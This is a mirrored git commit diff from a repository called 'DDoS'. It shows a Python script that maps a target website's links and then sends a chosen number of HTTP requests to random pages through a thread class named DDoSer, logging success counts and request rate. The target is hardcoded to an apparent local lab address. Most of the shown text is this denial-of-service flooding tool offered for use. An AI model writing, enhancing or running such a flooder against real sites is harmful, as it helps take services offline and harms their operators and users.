mirror of
https://github.com/Llloooggg/DDoS.git
synced 2026-03-06 01:56:23 +03:00
faster_than_requests
This commit is contained in:
4
.gitignore
vendored
4
.gitignore
vendored
@@ -2,4 +2,6 @@
|
||||
./venv
|
||||
./vscode
|
||||
./data.db
|
||||
./__pycache__
|
||||
./__pycache__
|
||||
./map.txt
|
||||
./maps
|
||||
76
__init__.py
Normal file → Executable file
76
__init__.py
Normal file → Executable file
@@ -1,11 +1,11 @@
|
||||
#!venv/bin/python3
|
||||
|
||||
import os
|
||||
import link_extractor
|
||||
import time
|
||||
import random
|
||||
import progressbar
|
||||
# import urllib.request as requests # urlib
|
||||
# import faster_than_requests as requests # faster_than_requests
|
||||
import requests
|
||||
import faster_than_requests as requests
|
||||
from datetime import datetime
|
||||
|
||||
from threading import Thread
|
||||
@@ -13,27 +13,27 @@ from threading import Thread
|
||||
global requestCountSuccess, requestCountExecuted
|
||||
|
||||
if not os.path.exists('./maps/'):
|
||||
os.makedirs('./maps/')
|
||||
os.makedirs('./maps/')
|
||||
|
||||
|
||||
def url_grab(full_url):
|
||||
|
||||
if os.path.exists(f'./maps/{url}'):
|
||||
if os.path.exists(f'./maps/{url}'):
|
||||
|
||||
with open(f'./maps/{url}', 'r') as f:
|
||||
subUrls = f.read().splitlines()
|
||||
else:
|
||||
with open(f'./maps/{url}', 'r') as f:
|
||||
subUrls = f.read().splitlines()
|
||||
else:
|
||||
|
||||
subUrls = link_extractor.extractor('http://' + url)
|
||||
subUrls = link_extractor.extractor('http://' + url)
|
||||
|
||||
os.mknod(f'./maps/{url}')
|
||||
with open(f'./maps/{url}', 'w') as f:
|
||||
for link in subUrls:
|
||||
print(link.strip(), file=f)
|
||||
os.mknod(f'./maps/{url}')
|
||||
with open(f'./maps/{url}', 'w') as f:
|
||||
for link in subUrls:
|
||||
print(link.strip(), file=f)
|
||||
|
||||
|
||||
print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
|
||||
return subUrls
|
||||
print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
|
||||
return subUrls
|
||||
|
||||
|
||||
class DDoSer(Thread):
|
||||
@@ -46,8 +46,8 @@ class DDoSer(Thread):
|
||||
global requestCountSuccess, requestCountExecuted
|
||||
|
||||
# responce = requests.urlopen(self.url).getcode() # urlib
|
||||
responce = requests.get(self.url).status_code
|
||||
if responce == 200:
|
||||
responce = requests.get(self.url)['status']
|
||||
if responce == '200 OK':
|
||||
requestCountSuccess += 1
|
||||
|
||||
requestCountExecuted += 1
|
||||
@@ -55,29 +55,29 @@ class DDoSer(Thread):
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
# url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
|
||||
url = '192.168.56.102'
|
||||
# url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
|
||||
url = '192.168.56.102'
|
||||
|
||||
subUrls = url_grab(url)
|
||||
subUrls = url_grab(url)
|
||||
|
||||
requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
|
||||
print()
|
||||
requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
|
||||
print()
|
||||
|
||||
startTime = time.time()
|
||||
requestCountExecuted = 0
|
||||
requestCountSuccess = 0
|
||||
startTime = time.time()
|
||||
requestCountExecuted = 0
|
||||
requestCountSuccess = 0
|
||||
|
||||
with progressbar.ProgressBar(max_value=requestCount) as bar:
|
||||
for i in range(requestCount):
|
||||
url = random.choice(subUrls)
|
||||
thread = DDoSer(url)
|
||||
thread.start()
|
||||
thread.join()
|
||||
bar.update(requestCountExecuted)
|
||||
|
||||
while requestCountExecuted < requestCount:
|
||||
bar.update(requestCountExecuted)
|
||||
with progressbar.ProgressBar(max_value=requestCount) as bar:
|
||||
for i in range(requestCount):
|
||||
url = random.choice(subUrls)
|
||||
thread = DDoSer(url)
|
||||
thread.start()
|
||||
thread.join()
|
||||
bar.update(requestCountExecuted)
|
||||
|
||||
while requestCountExecuted < requestCount:
|
||||
bar.update(requestCountExecuted)
|
||||
|
||||
print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
|
||||
print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
|
||||
print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')
|
||||
print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
|
||||
print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
|
||||
print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')
|
||||
|
||||
Reference in New Issue
Block a user